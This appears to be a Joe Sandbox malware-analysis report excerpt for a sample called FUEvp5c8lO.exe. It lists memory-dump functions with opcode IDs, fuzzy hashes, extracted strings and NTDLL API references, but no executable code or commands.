Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1e30b18ebf5ed45137b23946201e96df07cd57d32793ce41a58656e73647aa
Instruction ID: c477f5fbf7f7035f6783aff689249f3520f7d7cd0e950cd5d3252a4c90af60fa
Opcode Fuzzy Hash: 3c1e30b18ebf5ed45137b23946201e96df07cd57d32793ce41a58656e73647aa
Instruction Fuzzy Hash: BE7117B4E15609CFDF44CFA9C9805EEFBF6FF89210F24942AD419B7224E3349A418B64

Function 07385108 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61a1423088540d8415e1473812e6162c903cb914ee9abfbfa474f66da4eab27
Instruction ID: ae2f6d26d72802b32027aa98923efbc8225b17161e841297d1f30144d5c12c46
Opcode Fuzzy Hash: e61a1423088540d8415e1473812e6162c903cb914ee9abfbfa474f66da4eab27
Instruction Fuzzy Hash: EE7127B4E152098FDF44CFA9C9805EEFBF2BF89210F24946AD419F7264D3349A418B64

Function 073714D0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fce3d99098eafbf22429361268bf4bc0d3d54fe3be08df816c7407dd4a3509e5
Instruction ID: 82db7c8a8bedb68922e840866d64ac97c508883c7a0e853833fe81cf6469cebc
Opcode Fuzzy Hash: fce3d99098eafbf22429361268bf4bc0d3d54fe3be08df816c7407dd4a3509e5
Instruction Fuzzy Hash: 3C513BB5E012198FDB14CFA9C5805EEFBF2AF89311F24856AD818AB355D7349E41CFA0

Function 07371918 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2d28a391dd34d3f29d93771b24acf40afe7f9cca13afb4b92c7e08613ace78
Instruction ID: 0fb5bffd2bb073f016f36ad863d88af25f2260994768a03322a6827d8ba3e659
Opcode Fuzzy Hash: 4a2d28a391dd34d3f29d93771b24acf40afe7f9cca13afb4b92c7e08613ace78
Instruction Fuzzy Hash: 3C515DB5E102198FDB14DFA9C5805AEFBF2FF89301F248569C408A7355D7349942CFA0

Function 07388348 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd33f99b7e6570c2834d532c2698f55c8c122ddd63241ebb00b00823098bc587
Instruction ID: b4a21fc50670218dedd409eb70618dfc7e8596a618802b135dd3a581bbdcdaf6
Opcode Fuzzy Hash: cd33f99b7e6570c2834d532c2698f55c8c122ddd63241ebb00b00823098bc587
Instruction Fuzzy Hash: A54170B4E1630ADFDB44CFA5C6416EEFBF2AF86300F24D56AC108B7264D37486028B95

Function 07383B10 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7521842e8c49c7f6d79e5e2084577f59541e06094ebd46575fa00e6f3c1bc88
Instruction ID: 5b7231a88cf5bbe2e8d2bd38568cc3b2d5bba155c8c07d99925edc93859117b1
Opcode Fuzzy Hash: e7521842e8c49c7f6d79e5e2084577f59541e06094ebd46575fa00e6f3c1bc88
Instruction Fuzzy Hash: 654169F0D15209DFEB84EFAAC5814AEFBB6FF85600F24C5A9C419AB344D7349A408F91

Function 073853A8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855c6bd3a7ac7d1f23a28fd3cffa752391d04efff2ef6756f6844b62fa2d2391
Instruction ID: a41d9446d8cdadfa3ec40148a6fd85eec7ef2090d520d9c633fb422379b745f1
Opcode Fuzzy Hash: 855c6bd3a7ac7d1f23a28fd3cffa752391d04efff2ef6756f6844b62fa2d2391
Instruction Fuzzy Hash: D64116B0E1521ADBDB44CFA9C5816AEFBF6EF88200F24C56AC409F7214D7709A518BA4

Function 07385398 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e02e1b3c7f6f2606c964190e2680d8cab8dbc4acda566bfdbe7b99f82a4a9b87
Instruction ID: 8fdc4a212ba730820fdbdcb9be9d02d97f59953813e2257cf0aae857202b589d
Opcode Fuzzy Hash: e02e1b3c7f6f2606c964190e2680d8cab8dbc4acda566bfdbe7b99f82a4a9b87
Instruction Fuzzy Hash: B64126B1E1531ACFDB44CFA9C5816AEFBF2EF89200F24C56AC409E7214D7709A518B94

Function 07384F00 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c86e454801be275cd0d189949852c9afa133c02437f59af7acd9bb0175dcc
Instruction ID: 1a36efb89ca1ab154f10054e5165bb3adab477fe8c85ea3a14ef5137a2e0c2ef
Opcode Fuzzy Hash: 8f0c86e454801be275cd0d189949852c9afa133c02437f59af7acd9bb0175dcc
Instruction Fuzzy Hash: 3D4118B0E1524ACFEB84DFAAC4805AEFBF2EF89200F14C46AD419B7654D3349A41CF94

Function 07388358 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1257f3e3d6f97ea7e9cdf9380d785493dc9da1c2b89dcb66d96ccbe5991bae3e
Instruction ID: 235bc0564e9e50e86e0850d562d758a10534bee13da15db8c6d5ea5b5f3f9006
Opcode Fuzzy Hash: 1257f3e3d6f97ea7e9cdf9380d785493dc9da1c2b89dcb66d96ccbe5991bae3e
Instruction Fuzzy Hash: 9B412CB4E1530ADFDB44CFA5D5416AEFBF5AF89300F20946AC109B7264D37497418B94

Function 07384F10 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a7a2d5242386208eecfd65e92ec646201686edbbd4685cb28ff34112a07325
Instruction ID: 3364547b1104695aa6fd9925b57f839338abc76e340b845584d7011591866e0c
Opcode Fuzzy Hash: a7a7a2d5242386208eecfd65e92ec646201686edbbd4685cb28ff34112a07325
Instruction Fuzzy Hash: C541E6B0E1520ADFDB88DFAAD4805AEFBF6AF89200F14C46AC419B7644D3349A418F94

Function 0738001F Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2a235b2d9ee04c0d2a50a80a568a2b3f3494bea1cfd14f210050a99b35df54
Instruction ID: df24d2c7726631d836916fa521e6bc7a1b70df753f2794012d9a19c1a6af106e
Opcode Fuzzy Hash: 2c2a235b2d9ee04c0d2a50a80a568a2b3f3494bea1cfd14f210050a99b35df54
Instruction Fuzzy Hash: 2121DCB1E057558FEB49CF6B980069EBBF3AFCA200F18C0ABC458AA265D7340559CF51

Function 07380040 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f937890d07c3d6b6c07d1ba85c1d3be570dd2612ac5e14cce1d39319bfde4c86
Instruction ID: eaf2caca257441cbff9f125876e90a1b40486b655708aa9c903d1621328ed698
Opcode Fuzzy Hash: f937890d07c3d6b6c07d1ba85c1d3be570dd2612ac5e14cce1d39319bfde4c86
Instruction Fuzzy Hash: 5011DAB1E006189BEB5CCFABD84069EFAF7AFC9200F04C07AC91CB6254EB7406468F55

Analysis Process: FUEvp5c8lO.exePID: 8116, Parent PID: 7920COMMON

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	87
Total number of Limit Nodes:	0

Executed Functions

Function 053B0B20 Relevance: 1.6, APIs: 1, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 053B0B6C

Memory Dump Source

Source File: 00000003.00000002.2630441922.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_53b0000_FUEvp5c8lO.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc8952c74e02749e1d917c588ebf31c7006acd5d1b3f13c99e9f3e428bc427eb
Instruction ID: 29cf89ceca0cab60598c44666fd00e324940f9df32a35bd341b91f8b006a5d92
Opcode Fuzzy Hash: cc8952c74e02749e1d917c588ebf31c7006acd5d1b3f13c99e9f3e428bc427eb
Instruction Fuzzy Hash: 03218C307002258FDB19EB34C4587AE73F2EB8C345F200669D102A7399DFB69C42CB90

Function 01125AC0 Relevance: 1.5, Strings: 1, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vwn, xrefs: 01125D77

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: \Vwn
API String ID: 0-47881834
Opcode ID: 3dd41a38c7fe97e742d9565c7848a44eae28ec9e0c4ec443672378644c06d257
Instruction ID: 8e408995ab687af36b87cacc7e15462d7d07f9882e483cfffc56ab8f27dccc7b
Opcode Fuzzy Hash: 3dd41a38c7fe97e742d9565c7848a44eae28ec9e0c4ec443672378644c06d257
Instruction Fuzzy Hash: 54B14C70E00229CFDB58CFA9D8857EEBBF2AF88314F148129D415E7294EB749865CF81

Function 01126390 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e77f10c254794dfb8f3684441bcb5747ec1ba83820663c9fe712967e1f763c
Instruction ID: dc7bbdf91d732ed951c1dd8947e77074a0516733b097976d16ebc5e15d0499c7
Opcode Fuzzy Hash: c9e77f10c254794dfb8f3684441bcb5747ec1ba83820663c9fe712967e1f763c
Instruction Fuzzy Hash: A7B18D70E00269CFDF18CFA9D8957AEBBF2AF88354F148129D814E7294EB749855CB81

Function 01126108 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vwn, xrefs: 01126177
\Vwn, xrefs: 011262CA

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: \Vwn$\Vwn
API String ID: 0-3989312688
Opcode ID: a4246297d79b64b05e44835f09681302d039ea59fd540e016473e9287101b691
Instruction ID: a168bad5299b877a22279898f638533727deadf15676c271cf139981095558f7
Opcode Fuzzy Hash: a4246297d79b64b05e44835f09681302d039ea59fd540e016473e9287101b691
Instruction Fuzzy Hash: 7A716C70E04219CFDF18DFA9D8847DEBBF2BF89314F148129D819A7294EB749851CB91

Function 011260FC Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vwn, xrefs: 01126177
\Vwn, xrefs: 011262CA

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: \Vwn$\Vwn
API String ID: 0-3989312688
Opcode ID: 70090385178bff37a37ae7a737c965236c350d293b61e4b984090e5948a5331a
Instruction ID: 7d24903ec3b973e79fa58a8b9c51adb469feb7fabd7418a8f031a9a7b20c5b89
Opcode Fuzzy Hash: 70090385178bff37a37ae7a737c965236c350d293b61e4b984090e5948a5331a
Instruction Fuzzy Hash: 9E717C70E04219CFDF18DFA9D8847DEBBF1BF89314F148129D819A7294EB749851CB91

Function 0112CB98 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0112CD78

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 37b05440b622a7e72bb3237d5c782f23c269d18dc34688c6cdae0d6b4fe8ad92
Instruction ID: f7351295a8029e27e230269bb0b29cf907bf612810671e564c0480c2464f10a6
Opcode Fuzzy Hash: 37b05440b622a7e72bb3237d5c782f23c269d18dc34688c6cdae0d6b4fe8ad92
Instruction Fuzzy Hash: C4325870A00619DFDB28CFA8D884B9DFBF2FF89314F148619E4159B665D730E8A5CB84

Function 053B5311 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 053B53A3

Memory Dump Source

Source File: 00000003.00000002.2630441922.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_53b0000_FUEvp5c8lO.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a8ff6235d957cfb073314258db659c064af0a94ffdf6a5f94562fbb4247e295c
Instruction ID: 361d75320e00ba7ad3eea2be62fde1bd34551aac6522e6c141ce8be00fe2d5e8
Opcode Fuzzy Hash: a8ff6235d957cfb073314258db659c064af0a94ffdf6a5f94562fbb4247e295c
Instruction Fuzzy Hash: 50219C75804359DFCB10CFA9E840AEEBBB4BB08320F10825AE519B7391D7B46944CFA1

Function 053B0B1F Relevance: 1.6, APIs: 1, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 053B0B6C

Memory Dump Source

Source File: 00000003.00000002.2630441922.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_53b0000_FUEvp5c8lO.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 537bb564e45f9e34012dd20b719ed2d2ac6f06adbb18b2af1ace487aa9040451
Instruction ID: 73b5cc7e1dc05d86a100aad9ac70fa632c72d020b3ad4799fe840df9e580ce8c
Opcode Fuzzy Hash: 537bb564e45f9e34012dd20b719ed2d2ac6f06adbb18b2af1ace487aa9040451
Instruction Fuzzy Hash: 61214A307002258FDB59EB34C4587EE77F2AB8C345F244669D506A7799DBB68C42CB90

Function 053B5320 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 053B53A3

Memory Dump Source

Source File: 00000003.00000002.2630441922.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_53b0000_FUEvp5c8lO.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 967f532b5e841650858c83a90b16a1bae138f61ea07a01b740fe71fabd1b98e4
Instruction ID: 5991352d542ff5730c22c566c21e69a93bbbccb0bcb6dd51df3e21eae11c820b
Opcode Fuzzy Hash: 967f532b5e841650858c83a90b16a1bae138f61ea07a01b740fe71fabd1b98e4
Instruction Fuzzy Hash: 662134B5D04259CFDB00DFAAD844AEEBBB4BB08310F10815AE519B7390D7B46944CFA5

Function 01125AB4 Relevance: 1.5, Strings: 1, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vwn, xrefs: 01125D77

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: \Vwn
API String ID: 0-47881834
Opcode ID: de1d1b15a8c80cfff31b8e11d2097b21e551d24ed9dcbd8ebbf05e19741fbe16
Instruction ID: 69e527f8a24bad62608420e2c23e6e772c3d21ce8a7aac41936f5459f95b65b0
Opcode Fuzzy Hash: de1d1b15a8c80cfff31b8e11d2097b21e551d24ed9dcbd8ebbf05e19741fbe16
Instruction Fuzzy Hash: 13B15C70E00229CFDB58CFA9D8857EEBBF2AF48314F148129D815E7254EB749865CF91

Function 053B0A6A Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 053B0A89

Memory Dump Source

Source File: 00000003.00000002.2630441922.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_53b0000_FUEvp5c8lO.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 154db3e226a6812435d697afad9f33060cae4e2ba199a3c5630366fecf2f9f5a
Instruction ID: 9fb21a5c16d8833c400291c537d31052e3be76b2e852d40f008b3b725a7de7b1
Opcode Fuzzy Hash: 154db3e226a6812435d697afad9f33060cae4e2ba199a3c5630366fecf2f9f5a
Instruction Fuzzy Hash: 2BE09276911524DFEB2AEB94E95C6EDF331FB84311F018525C28263D44CBB16C92CBC5

Function 053B0A7C Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 053B0A89

Memory Dump Source

Source File: 00000003.00000002.2630441922.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_53b0000_FUEvp5c8lO.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f12fc41ddd10c7621369248ae346db28f5ad944d1ace35c2b7e8ba4caafd8ebe
Instruction ID: b55c5a338295b4def88648f3dd65ba009cf284e08816f58d90f6c4cd4bb116b5
Opcode Fuzzy Hash: f12fc41ddd10c7621369248ae346db28f5ad944d1ace35c2b7e8ba4caafd8ebe
Instruction Fuzzy Hash: F8E04F76911924DBEB19DB84E99C6EDF371FB80311F008525C68653944CBB16892CB84

Function 01128651 Relevance: 1.4, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 011287A7

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 387f42e6fb0037e94b7ecd3ecc68a04b6b3b1a0f3262a9e6f3bf50e678cd816d
Instruction ID: 7eb3071fd9591b0efbd23766f2cfb8969ec97812f18b9ee7ec02483b59ca0e6f
Opcode Fuzzy Hash: 387f42e6fb0037e94b7ecd3ecc68a04b6b3b1a0f3262a9e6f3bf50e678cd816d
Instruction Fuzzy Hash: 8351A474E00619CFC729DFA9C4505AEBBF2BF89304B20852ED406AB355DB70ED56DB81

Function 01121782 Relevance: 1.4, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d<t, xrefs: 0112179D

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: d<t
API String ID: 0-1075490384
Opcode ID: 5e046213d75f9b265e464337a68c974680e9a10a358fb5fbb7d907061cace4b3
Instruction ID: 7a01867349865e6955a84cf1fb41e998073c27069d7c0add273016298e32be9f
Opcode Fuzzy Hash: 5e046213d75f9b265e464337a68c974680e9a10a358fb5fbb7d907061cace4b3
Instruction Fuzzy Hash: 4D410534B101148FDB48DF69C498B6DBBE6AF88710F258099E546EB3B6CA75EC018B91

Function 0112CA09 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

&?A, xrefs: 0112CA36

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: 8ae3b1e7e5ff6e75eb366c9f44be4e7c91e76141794975f37a8c66315101aa0f
Instruction ID: 7d2c13b057ab4ec9926d79689ac9c3df1151dfa8aecbc7f4e5b54feaf9ed9fd7
Opcode Fuzzy Hash: 8ae3b1e7e5ff6e75eb366c9f44be4e7c91e76141794975f37a8c66315101aa0f
Instruction Fuzzy Hash: FF1182B1A403008FDB449F64D8407AA7BA1FFC9310F15C579D5489F29ADB799C15CB60

Function 0112CA18 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

&?A, xrefs: 0112CA36

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: 41ab1b67512ae1e27ce7b853f0a17d7d80ee09a6ba25caac0f86f8c8aae4b1c5
Instruction ID: ef7a80581bb6ff61df295b40508df6e8db5c2a773175df0bfbdff364ca093645
Opcode Fuzzy Hash: 41ab1b67512ae1e27ce7b853f0a17d7d80ee09a6ba25caac0f86f8c8aae4b1c5
Instruction Fuzzy Hash: C401B1B1A003008FEB04DF55D88475ABBA6FFC8710F10C479E9089F39ADBB59814CBA0

Function 01127588 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

X, xrefs: 01127594

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: f5f39ef3fba1b53909dd1cc3454c7de4667a3188a7a188230398ae5282f53090
Instruction ID: 90ea7c17ced1faf93683c4b8e524f64c1e02401a5c608d0c873f0df11e9473ff
Opcode Fuzzy Hash: f5f39ef3fba1b53909dd1cc3454c7de4667a3188a7a188230398ae5282f53090
Instruction Fuzzy Hash: D0014B34A04155DFCB95EF69E9519EAB7F1FB45200B0002ADDC09C7B44FB32A920EB83

Function 01121F3F Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c009891ac7338855c767580c08896a046505caf4a310a045c9806424361f49
Instruction ID: ef1e2ba13e73268ec22ecc636da229f11870ff53a5aba653cf215729f8a86bae
Opcode Fuzzy Hash: 43c009891ac7338855c767580c08896a046505caf4a310a045c9806424361f49
Instruction Fuzzy Hash: 2372BB70A0021C8FEB95EBA0CD547EE77B6BF88300F1080A9D14A673A8DE355E95DF95

Function 01121F50 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 863f8b869d6615af82e79b386ac6d4762c1e6ae9429eace3821688febf7dd32a
Instruction ID: efc4826c2ea57b7448ee11dbeb79b38f5a6db01f318ff4fbd58283ab98a001e2
Opcode Fuzzy Hash: 863f8b869d6615af82e79b386ac6d4762c1e6ae9429eace3821688febf7dd32a
Instruction Fuzzy Hash: 6872AA70A0021C8FEB95EBA0CD547EE77B6BF88300F1080A9D14A673A8DE355E95DF95

Function 01128970 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bdea35bc2b8f167796c4d565db927e24506b9991df6d214090648b47b8b4718
Instruction ID: c815b5c1743dc405dd80dc7eccb6204ca7f1995257104851df8e8d7673922fbf
Opcode Fuzzy Hash: 7bdea35bc2b8f167796c4d565db927e24506b9991df6d214090648b47b8b4718
Instruction Fuzzy Hash: F352EE38A40319DFEF06EBA1E854BAEB773FB8C310F108514E90623799DB35A851DB65

Function 0112AA08 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c29fc64bf5d05f6714d187a06715d54775cabfc5e90587777b5193999bc46b63
Instruction ID: 5d110ac96362e55a29ceb32d5204ef372cc4895015c71eeed1e9fb32068863be
Opcode Fuzzy Hash: c29fc64bf5d05f6714d187a06715d54775cabfc5e90587777b5193999bc46b63
Instruction Fuzzy Hash: 08B1F435B053558FCB06DF74E4A45AD7FB2EF86310B4A8696C441CB3A6DB385C06CBA1

Function 01126385 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
